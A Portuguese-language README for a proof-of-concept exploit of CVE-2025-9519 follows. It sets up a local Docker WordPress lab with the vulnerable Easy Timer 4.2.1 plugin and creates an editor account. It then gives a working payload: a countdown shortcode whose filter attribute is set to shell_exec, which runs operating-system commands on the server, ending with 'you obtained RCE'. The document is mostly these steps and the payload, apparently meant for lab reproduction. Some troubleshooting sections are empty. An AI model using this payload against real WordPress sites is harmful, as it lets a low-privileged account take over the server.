
Prova de conceito de exploit para CVE-2025-9519, demonstrando execução remota de código no plugin WordPress Easy Timer por meio de um filtro de shortcode malicioso, com configuração baseada em Docker.
Consulte a documentação oficial do Docker para instalação: Instalação do Docker Engine
A partir do diretório do seu projeto:
sudo docker-compose up -d
mkdir -p wp-content/plugins
cd wp-content/plugins
wget https://downloads.wordpress.org/plugin/easy-timer.4.2.1.zip
unzip easy-timer.4.2.1.zip
sudo docker compose restart wordpress
http://localhost:8000/Painel do WordPress → Plugins → e clique em .
Easy TimerAtivar
A partir do diretório do seu projeto, execute o seguinte comando:
docker compose run --rm wpcli user create \
editoruser [email protected] \
--role=editor \
--user_pass=P@ssw0rd!
(nota: substitua pelo seu nome de usuário, e-mail e senha de sua escolha!)
Posts → Adicionar NovoBloco de Shortcode e digite:[countdown date=2025/12/17-00:00:00 filter="shell_exec"]ls -l[/countdown]
⚠️ Nota: Certifique-se de que está usando um Bloco de Shortcode, não um bloco de Parágrafo, para que o shortcode seja renderizado corretamente.

Parabéns, você obteve RCE.

sudo docker ps
Você deve ver algo como:

Se os shortcodes não estiverem sendo renderizados:
Se ao navegar para http://localhost:8000/ aparecer Banco de Dados Não Conectado: